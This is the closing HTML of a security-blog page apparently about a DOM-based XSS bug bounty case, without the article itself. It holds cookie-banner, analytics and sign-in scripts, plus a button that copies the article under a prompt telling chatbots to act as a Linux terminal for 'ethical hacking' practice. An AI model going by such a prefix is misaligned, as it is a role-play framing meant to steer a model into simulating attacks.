storage or access is required to create user profiles to send advertising, or to track the user on a website or across several websites for similar marketing purposes.</span> </div> </details> </div> </div> <div class="cmplz-links cmplz-information"> <ul> <li><a class="cmplz-link cmplz-manage-options cookie-statement" href="#" data-relative_url="#cmplz-manage-consent-container">Manage options</a></li> <li><a class="cmplz-link cmplz-manage-third-parties cookie-statement" href="#" data-relative_url="#cmplz-cookies-overview">Manage services</a></li> <li><a class="cmplz-link cmplz-manage-vendors tcf cookie-statement" href="#" data-relative_url="#cmplz-tcf-wrapper">Manage {vendor_count} vendors</a></li> <li><a class="cmplz-link cmplz-external cmplz-read-more-purposes tcf" target="_blank" rel="noopener noreferrer nofollow" href="https://cookiedatabase.org/tcf/purposes/" aria-label="Read more about TCF purposes on Cookie Database">Read more about these purposes</a></li> </ul> </div> <div class="cmplz-divider cmplz-footer"></div> <div class="cmplz-buttons"> <button class="cmplz-btn cmplz-accept">Accept</button> <button class="cmplz-btn cmplz-deny">Deny</button> <button class="cmplz-btn cmplz-view-preferences">View preferences</button> <button class="cmplz-btn cmplz-save-preferences">Save preferences</button> <a class="cmplz-btn cmplz-manage-options tcf cookie-statement" href="#" data-relative_url="#cmplz-manage-consent-container">View preferences</a> </div> <div class="cmplz-documents cmplz-links"> <ul> <li><a class="cmplz-link cookie-statement" href="#" data-relative_url="">{title}</a></li> <li><a class="cmplz-link privacy-statement" href="#" data-relative_url="">{title}</a></li> <li><a class="cmplz-link impressum" href="#" data-relative_url="">{title}</a></li> </ul> </div> </div> </div> <div id="cmplz-manage-consent" data-nosnippet="true"><button class="cmplz-btn cmplz-hidden cmplz-manage-consent manage-consent-1">Manage consent</button> </div> <script> const lazyloadRunObserver = () => { const lazyloadBackgrounds = document.querySelectorAll( `.e-con.e-parent:not(.e-lazyloaded)` ); const lazyloadBackgroundObserver = new IntersectionObserver( ( entries ) => { entries.forEach( ( entry ) => { if ( entry.isIntersecting ) { let lazyloadBackground = entry.target; if( lazyloadBackground ) { lazyloadBackground.classList.add( 'e-lazyloaded' ); } lazyloadBackgroundObserver.unobserve( entry.target ); } }); }, { rootMargin: '200px 0px 200px 0px' } ); lazyloadBackgrounds.forEach( ( lazyloadBackground ) => { lazyloadBackgroundObserver.observe( lazyloadBackground ); } ); }; const events = [ 'DOMContentLoaded', 'elementor/lazyload/observe', ]; events.forEach( ( event ) => { document.addEventListener( event, lazyloadRunObserver ); } ); </script>  <style> .googlesitekit-sign-in-with-google__frontend-output-button{max-width:320px} </style> <script src="https://accounts.google.com/gsi/client"></script> <script> (()=>{async function handleCredentialResponse(response){try{const res=await fetch('https://undercodetesting.com/wp-login.php?action=googlesitekit_auth',{method:'POST',headers:{'Content-Type':'application/x-www-form-urlencoded'},body:new URLSearchParams(response)});/* Preserve comment text in case of redirect after login on a page with a Sign in with Google button in the WordPress comments. */ const commentText=document.querySelector('#comment')?.value;const postId=document.querySelectorAll('.googlesitekit-sign-in-with-google__comments-form-button')?.[0]?.className?.match(/googlesitekit-sign-in-with-google__comments-form-button-postid-(\d+)/)?.[1];if(!! commentText?.length){sessionStorage.setItem(`siwg-comment-text-${postId}`,commentText);}location.reload();}catch(error){console.error(error);}}if(typeof google !=='undefined'){google.accounts.id.initialize({client_id:'434315219136-8dok14874vc4jqqqsrntljg23lcofrv4.apps.googleusercontent.com',callback:handleCredentialResponse,library_name:'Site-Kit'});}const defaultButtonOptions={"theme":"outline","text":"signin_with","shape":"rectangular"};document.querySelectorAll('.googlesitekit-sign-in-with-google__frontend-output-button').forEach((siwgButtonDiv)=>{const buttonOptions={shape:siwgButtonDiv.getAttribute('data-googlesitekit-siwg-shape')|| defaultButtonOptions.shape,text:siwgButtonDiv.getAttribute('data-googlesitekit-siwg-text')|| defaultButtonOptions.text,theme:siwgButtonDiv.getAttribute('data-googlesitekit-siwg-theme')|| defaultButtonOptions.theme,};if(typeof google !=='undefined'){google.accounts.id.renderButton(siwgButtonDiv,buttonOptions);}});/* If there is a matching saved comment text in sessionStorage,restore it to the comment field and remove it from sessionStorage. */ const postId=document.body.className.match(/postid-(\d+)/)?.[1];const commentField=document.querySelector('#comment');const commentText=sessionStorage.getItem(`siwg-comment-text-${postId}`);if(commentText?.length && commentField && !! postId){commentField.value=commentText;sessionStorage.removeItem(`siwg-comment-text-${postId}`);}})(); </script>  <script> (function() { // Secure configuration const uacConfig = {"selector":"article .entry-content","maxLines":57,"robotSVG":"<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 24 24\" width=\"28\" height=\"28\"><path fill=\"#fff\" d=\"M20 9V7c0-1.1-.9-2-2-2h-3c0-1.66-1.34-3-3-3S9 3.34 9 5H6c-1.1 0-2 .9-2 2v2c-1.66 0-3 1.34-3 3s1.34 3 3 3v4c0 1.1.9 2 2 2h12c1.1 0 2-.9 2-2v-4c1.66 0 3-1.34 3-3s-1.34-3-3-3zm-2 10H6V7h12v12zm-9-6c-.83 0-1.5-.67-1.5-1.5S8.17 10 9 10s1.5.67 1.5 1.5S9.83 13 9 13zm7.5-1.5c0 .83-.67 1.5-1.5 1.5s-1.5-.67-1.5-1.5.67-1.5 1.5-1.5 1.5.67 1.5 1.5zM8 15h8v2H8v-2z\"\/><\/svg>","ttsKeywords":["Listen to this Post","Listen","Auto\u2011play on page load","Google Deutsch","Google US English","Google UK English Female","Google UK English Male","Google espa\u00f1ol","Google espa\u00f1ol de Estados Unidos","Google fran\u00e7ais","Google \u0939\u093f\u0928\u094d\u0926\u0940","Google Bahasa Indonesia","Google italiano","Google \u65e5\u672c\u8a9e","Google\u00a0\u666e\u901a\u8bdd","(\u4e2d\u56fd\u5927\u9646)","(zh-CN)","Google \ud55c\uad6d\uc758","Google Nederlands","Google polski","Google portugu\u00eas do Brasil","Google \u0440\u0443\u0441\u0441\u043a\u0438\u0439","Google \u666e\u901a\u8bdd\uff08\u4e2d\u56fd\u5927\u9646\uff09","Google \u7ca4\u8a9e\uff08\u9999\u6e2f\uff09","Google \u570b\u8a9e\uff08\u81fa\u7063\uff09","Google \u666e\u901a\u8bdd\uff08\u4e2d\u56fd\u5927\u9646)","(zh-CN)Google \u7ca4\u8a9e","\uff08\u9999\u6e2f\uff09 (zh-HK)","\ud83d\udc22","\ud83d\ude80"],"copyPrefix":"You are now acting as a Linux terminal. Reply only with the terminal output based on this article. If you understand it, reply with a terminal output: \"undercode@attack-lab:~$\". Help me practice ethical hacking, the article: ","aiInstructions":"\n <div class=\"uac-ai-final\">1- Select AI, then paste the copied content<br>2- The AI will act like a linux emulator<\/div>\n<div class=\"uac-ai-step\">\ud83e\udd16 <a href=\"https:\/\/chat.openai.com\" target=\"_blank\" rel=\"noopener\" style=\"color:#0073e6;\">Continue with ChatGPT (OpenAI)<\/a><\/div>\n<div class=\"uac-ai-step\">\ud83d\udd0d <a href=\"https:\/\/chat.deepseek.com\" target=\"_blank\" rel=\"noopener\" style=\"color:#0073e6;\">Continue with DeepSeek Chat<\/a><\/div>\n<div class=\"uac-ai-step\">\u2601\ufe0f <a href=\"https:\/\/claude.ai\" target=\"_blank\" rel=\"noopener\" style=\"color:#0073e6;\">Continue with Claude AI<\/a><\/div>\n "}; // Advanced TTS removal system function removeTtsElements(element) { // Remove by known TTS classes const ttsClasses = ['tts-player', 'listen-section', 'language-selector']; ttsClasses.forEach(cls => { const elements = element.querySelectorAll(`.${cls}`); elements.forEach(el => el.remove()); }); // Remove by text content using keywords const walker = document.createTreeWalker(element, NodeFilter.SHOW_TEXT); const nodesToRemove = []; let node; while (node = walker.nextNode()) { const text = node.nodeValue.trim(); if (uacConfig.ttsKeywords.some(keyword => text.includes(keyword))) { nodesToRemove.push(node.parentNode); } } // Remove identified TTS nodes nodesToRemove.forEach(node => { if (node && node.parentNode) { node.parentNode.removeChild(node); } }); } document.addEventListener('DOMContentLoaded', function() { const buttons = document.querySelectorAll('.uac-btn'); buttons.forEach(btn => { // Initialize button securely btn.innerHTML = ` <span class="uac-btn-content"> ${uacConfig.robotSVG} <span>AI Pentesting Pro (Based on This Article)🦑</span> </span> `; const originalHTML = btn.innerHTML; btn.addEventListener('click', async function() { const container = document.querySelector(uacConfig.selector); if (!container) { console.warn('Content container not found'); return; } // Clone the container to avoid modifying the original const clone = container.cloneNode(true); // Remove TTS elements removeTtsElements(clone); // Get text content after removing TTS sections const fullText = clone.innerText || clone.textContent || ''; if (!fullText.trim()) { console.warn('No text content found after filtering'); return; } // Split into lines and process const lines = fullText.split('\n') .map(line => line.trim()) .filter(line => line.length > 0); let snippet, displayText; if (lines.length < 3) { snippet = fullText.substring(0, 500); displayText = snippet + (fullText.length > 500 ? '...' : ''); } else { snippet = lines.slice(0, uacConfig.maxLines).join('\n'); displayText = snippet.length > 500 ? snippet.substring(0, 500) + '...' : snippet; } // Add prefix to text to be copied const textToCopy = uacConfig.copyPrefix + '\n\n' + snippet; // Securely copy to clipboard try { await navigator.clipboard.writeText(textToCopy); // Update UI securely btn.classList.add('uac-copied'); btn.innerHTML = ` <span class="uac-btn-content"> ${uacConfig.robotSVG} <span>Scroll to Continue!</span> </span> `; // Create/update message container securely let wrapper = btn.closest('.uac-wrapper'); let messageDiv = wrapper.querySelector('.uac-message'); if (!messageDiv) { messageDiv = document.createElement('div'); messageDiv.className = 'uac-message'; messageDiv.setAttribute('aria-live', 'polite'); messageDiv.setAttribute('role', 'status'); wrapper.appendChild(messageDiv); } // Securely set text content const prefix = document.createElement('div'); prefix.className = 'uac-message-prefix'; prefix.textContent = 'Copied first ' + uacConfig.maxLines + ' lines:'; const content = document.createElement('div'); content.className = 'uac-copied-content'; content.textContent = displayText; // Create AI instructions section const instructions = document.createElement('div'); instructions.className = 'uac-ai-instructions'; instructions.innerHTML = uacConfig.aiInstructions; // Clear existing content safely while (messageDiv.firstChild) { messageDiv.removeChild(messageDiv.firstChild); } messageDiv.appendChild(prefix); messageDiv.appendChild(content); messageDiv.appendChild(instructions); // Add instructions // Reset button after 3 seconds setTimeout(() => { btn.classList.remove('uac-copied'); btn.innerHTML = originalHTML; }, 3000); } catch (err) { console.error('Copy failed:', err); btn.classList.add('uac-error'); btn.innerHTML = ` <span class="uac-btn-content"> ${uacConfig.robotSVG} <span>Error!</span> </span> `; setTimeout(() => { btn.classList.remove('uac-error'); btn.innerHTML = originalHTML; }, 3000); } }); }); }); })(); </script> <script id="astra-theme-js-js-extra"> var astra = {"break_point":"921","isRtl":"","is_scroll_to_id":"1","is_scroll_to_top":"","is_header_footer_builder_active":"1","responsive_cart_click":"flyout","is_dark_palette":""}; //# sourceURL=astra-theme-js-js-extra </script> <script id="astra-theme-js-js" src="https://undercodetesting.com/wp-content/themes/astra/assets/js/minified/frontend.min.js?ver=4.13.3"></script> <script id="sac-js" src="https://undercodetesting.com/wp-content/plugins/simple-ajax-chat/resources/sac.php?ver=20260422"></script> <script id="uctts-script-js-extra"> var ucttsConfig = {"selector":".entry-content.clear","rates":{"slow":0.75,"normal":1,"fast":1.5},"locale":"en-US","version":"3.2.20"}; //# sourceURL=uctts-script-js-extra </script> <script id="uctts-script-js" src="https://undercodetesting.com/wp-content/plugins/undercode-tts_ut/js/uctts-script_v3220.js?ver=3.2.20"></script> <script id="enlighterjs-js" src="https://undercodetesting.com/wp-content/plugins/enlighter/cache/enlighterjs.min.js?ver=WYxHAFvXmhTdHol"></script> <script id="enlighterjs-js-after"> !function(e,n){if("undefined"!=typeof EnlighterJS){var o={"selectors":{"block":"pre.EnlighterJSRAW","inline":"code.EnlighterJSRAW"},"options":{"indent":4,"ampersandCleanup":true,"linehover":true,"rawcodeDbclick":false,"textOverflow":"break","linenumbers":true,"theme":"beyond","language":"generic","retainCssClasses":false,"collapse":false,"toolbarOuter":"","toolbarTop":"{BTN_RAW}{BTN_COPY}{BTN_WINDOW}{BTN_WEBSITE}","toolbarBottom":""}};(e.EnlighterJSINIT=function(){EnlighterJS.init(o.selectors.block,o.selectors.inline,o.options)})()}else{(n&&(n.error||n.log)||function(){})("Error: EnlighterJS resources not loaded yet!")}}(window,console); //# sourceURL=enlighterjs-js-after </script> <script id="jetpack-stats-js-before"> _stq = window._stq || []; _stq.push([ "view", {"v":"ext","blog":"181153575","post":"31818","tz":"0","srv":"undercodetesting.com","j":"1:15.8"} ]); _stq.push([ "clickTrackerInit", "181153575", "31818" ]); //# sourceURL=jetpack-stats-js-before </script> <script type="text/plain" data-service="jetpack-statistics" data-category="statistics" data-wp-strategy="defer" defer id="jetpack-stats-js" data-cmplz-src="https://stats.wp.com/e-202623.js"></script> <script id="cmplz-cookiebanner-js-extra"> var complianz = {"prefix":"cmplz_","user_banner_id":"1","set_cookies":[],"block_ajax_content":"","banner_version":"36","version":"7.4.6","store_consent":"","do_not_track_enabled":"1","consenttype":"optin","region":"eu","geoip":"","dismiss_timeout":"","disable_cookiebanner":"","soft_cookiewall":"","dismiss_on_scroll":"","cookie_expiry":"365","url":"https://undercodetesting.com/wp-json/complianz/v1/","locale":"lang=en&locale=en_US","set_cookies_on_root":"","cookie_domain":"","current_policy_id":"29","cookie_path":"/","categories":{"statistics":"statistics","marketing":"marketing"},"tcf_active":"","placeholdertext":"Click to accept {category} cookies and enable this content","css_file":"https://undercodetesting.com/wp-content/uploads/complianz/css/banner-{banner_id}-{type}.css?v=36","page_links":{"eu":{"cookie-statement":{"title":"Cookie Policy","url":"https://undercodetesting.com/privacy-policy/"},"privacy-statement":{"title":"Privacy Statement","url":"https://undercodetesting.com/privacy-policy/"},"impressum":{"title":"Impressum","url":"https://undercodetesting.com/privacy-policy/"}},"us":{"impressum":{"title":"Impressum","url":"https://undercodetesting.com/privacy-policy/"}},"uk":{"impressum":{"title":"Impressum","url":"https://undercodetesting.com/privacy-policy/"}},"ca":{"impressum":{"title":"Impressum","url":"https://undercodetesting.com/privacy-policy/"}},"au":{"impressum":{"title":"Impressum","url":"https://undercodetesting.com/privacy-policy/"}},"za":{"impressum":{"title":"Impressum","url":"https://undercodetesting.com/privacy-policy/"}},"br":{"impressum":{"title":"Impressum","url":"https://undercodetesting.com/privacy-policy/"}}},"tm_categories":"","forceEnableStats":"","preview":"","clean_cookies":"","aria_label":"Click to accept {category} cookies and enable this content"}; //# sourceURL=cmplz-cookiebanner-js-extra </script> <script defer id="cmplz-cookiebanner-js" src="https://undercodetesting.com/wp-content/plugins/complianz-gdpr/cookiebanner/js/complianz.min.js?ver=1776682381"></script> <script id="cmplz-cookiebanner-js-after"> if ('undefined' != typeof window.jQuery) { jQuery(document).ready(function ($) { $(document).on('elementor/popup/show', () => { let rev_cats = cmplz_categories.reverse(); for (let key in rev_cats) { if (rev_cats.hasOwnProperty(key)) { let category = cmplz_categories[key]; if (cmplz_has_consent(category)) { document.querySelectorAll('[data-category="' + category + '"]').forEach(obj => { cmplz_remove_placeholder(obj); }); } } } let services = cmplz_get_services_on_page(); for (let key in services) { if (services.hasOwnProperty(key)) { let service = services[key].service; let category = services[key].category; if (cmplz_has_service_consent(service, category)) { document.querySelectorAll('[data-service="' + service + '"]').forEach(obj => { cmplz_remove_placeholder(obj); }); } } } }); }); } document.addEventListener("cmplz_enable_category", function(consentData) { var category = consentData.detail.category; var services = consentData.detail.services; var blockedContentContainers = []; let selectorVideo = '.cmplz-elementor-widget-video-playlist[data-category="'+category+'"],.elementor-widget-video[data-category="'+category+'"]'; let selectorGeneric = '[data-cmplz-elementor-href][data-category="'+category+'"]'; for (var skey in services) { if (services.hasOwnProperty(skey)) { let service = skey; selectorVideo +=',.cmplz-elementor-widget-video-playlist[data-service="'+service+'"],.elementor-widget-video[data-service="'+service+'"]'; selectorGeneric +=',[data-cmplz-elementor-href][data-service="'+service+'"]'; } } document.querySelectorAll(selectorVideo).forEach(obj => { let elementService = obj.getAttribute('data-service'); if ( cmplz_is_service_denied(elementService) ) { return; } if (obj.classList.contains('cmplz-elementor-activated')) return; obj.classList.add('cmplz-elementor-activated'); if ( obj.hasAttribute('data-cmplz_elementor_widget_type') ){ let attr = obj.getAttribute('data-cmplz_elementor_widget_type'); obj.classList.removeAttribute('data-cmplz_elementor_widget_type'); obj.classList.setAttribute('data-widget_type', attr); } if (obj.classList.contains('cmplz-elementor-widget-video-playlist')) { obj.classList.remove('cmplz-elementor-widget-video-playlist'); obj.classList.add('elementor-widget-video-playlist'); } obj.setAttribute('data-settings', obj.getAttribute('data-cmplz-elementor-settings')); blockedContentContainers.push(obj); }); document.querySelectorAll(selectorGeneric).forEach(obj => { let elementService = obj.getAttribute('data-service'); if ( cmplz_is_service_denied(elementService) ) { return; } if (obj.classList.contains('cmplz-elementor-activated')) return; if (obj.classList.contains('cmplz-fb-video')) { obj.classList.remove('cmplz-fb-video'); obj.classList.add('fb-video'); } obj.classList.add('cmplz-elementor-activated'); obj.setAttribute('data-href', obj.getAttribute('data-cmplz-elementor-href')); blockedContentContainers.push(obj.closest('.elementor-widget')); }); /** * Trigger the widgets in Elementor */ for (var key in blockedContentContainers) { if (blockedContentContainers.hasOwnProperty(key) && blockedContentContainers[key] !== undefined) { let blockedContentContainer = blockedContentContainers[key]; if (elementorFrontend.elementsHandler) { elementorFrontend.elementsHandler.runReadyTrigger(blockedContentContainer) } var cssIndex = blockedContentContainer.getAttribute('data-placeholder_class_index'); blockedContentContainer.classList.remove('cmplz-blocked-content-container'); blockedContentContainer.classList.remove('cmplz-placeholder-' + cssIndex); } } }); let cmplzBlockedContent = document.querySelector('.cmplz-blocked-content-notice'); if ( cmplzBlockedContent) { cmplzBlockedContent.addEventListener('click', function(event) { event.stopPropagation(); }); } //# sourceURL=cmplz-cookiebanner-js-after </script> <script id="gt_widget_script_50526273-js-before"> window.gtranslateSettings = /* document.write */ window.gtranslateSettings || {};window.gtranslateSettings['50526273'] = {"default_language":"en","languages":["af","sq","ar","zh-CN","hr","nl","en","et","tl","fi","fr","de","el","iw","hi","id","it","ja","ku","la","pl","pt","ro","ru","es","sv","ta","te","tr","uk"],"url_structure":"none","native_language_names":1,"detect_browser_language":1,"flag_style":"3d","flag_size":24,"wrapper_selector":"#gt-wrapper-50526273","alt_flags":{"en":"usa"},"horizontal_position":"inline","flags_location":"\/wp-content\/plugins\/gtranslate\/flags\/"}; //# sourceURL=gt_widget_script_50526273-js-before </script><script src="https://undercodetesting.com/wp-content/plugins/gtranslate/js/popup.js?ver=ca87a88d26a9da37af590fea05c39b78" data-no-optimize="1" data-no-minify="1" data-gt-orig-url="/exploiting-dom-based-xss-a-real-world-bug-bounty-case-study/" data-gt-orig-domain="undercodetesting.com" data-gt-widget-id="50526273" defer></script> <script> /(trident|msie)/i.test(navigator.userAgent)&&document.getElementById&&window.addEventListener&&window.addEventListener("hashchange",function(){var t,e=location.hash.substring(1);/^[A-z0-9_-]+$/.test(e)&&(t=document.getElementById(e))&&(/^(?:a|select|input|button|textarea)$/i.test(t.tagName)||(t.tabIndex=-1),t.focus())},!1); </script> <script id="wp-emoji-settings" type="application/json"> {"baseUrl":"https://s.w.org/images/core/emoji/17.0.2/72x72/","ext":".png","svgUrl":"https://s.w.org/images/core/emoji/17.0.2/svg/","svgExt":".svg","source":{"concatemoji":"https://undercodetesting.com/wp-includes/js/wp-emoji-release.min.js?ver=ca87a88d26a9da37af590fea05c39b78"}} </script> <script type="module"> /*! This file is auto-generated */ const a=JSON.parse(document.getElementById("wp-emoji-settings").textContent),o=(window._wpemojiSettings=a,"wpEmojiSettingsSupports"),s=["flag","emoji"];function i(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function c(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0);const a=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);return t.every((e,t)=>e===a[t])}function p(e,t){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var n=e.getImageData(16,16,1,1);for(let e=0;e<n.data.length;e++)if(0!==n.data[e])return!1;return!0}function u(e,t,n,a){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\udde8\ud83c\uddf6","\ud83c\udde8\u200b\ud83c\uddf6")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!a(e,"\ud83e\u1fac8")}return!1}function f(e,t,n,a){let r;const o=(r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):document.createElement("canvas")).getContext("2d",{willReadFrequently:!0}),s=(o.textBaseline="top",o.font="600 32px Arial",{});return e.forEach(e=>{s[e]=t(o,e,n,a)}),s}function r(e){var t=document.createElement("script");t.src=e,t.defer=!0,document.head.appendChild(t)}a.supports={everything:!0,everythingExceptFlag:!0},new Promise(t=>{let n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),c.toString(),p.toString()].join(",")+"));",a=new Blob([e],{type:"text/javascript"});const r=new Worker(URL.createObjectURL(a),{name:"wpTestEmojiSupports"});return void(r.onmessage=e=>{i(n=e.data),r.terminate(),t(n)})}catch(e){}i(n=f(s,u,c,p))}t(n)}).then(e=>{for(const n in e)a.supports[n]=e[n],a.supports.everything=a.supports.everything&&a.supports[n],"flag"!==n&&(a.supports.everythingExceptFlag=a.supports.everythingExceptFlag&&a.supports[n]);var t;a.supports.everythingExceptFlag=a.supports.everythingExceptFlag&&!a.supports.flag,a.supports.everything||((t=a.source||{}).concatemoji?r(t.concatemoji):t.wpemoji&&t.twemoji&&(r(t.twemoji),r(t.wpemoji)))}); //# sourceURL=https://undercodetesting.com/wp-includes/js/wp-emoji-loader.min.js </script> </body> </html>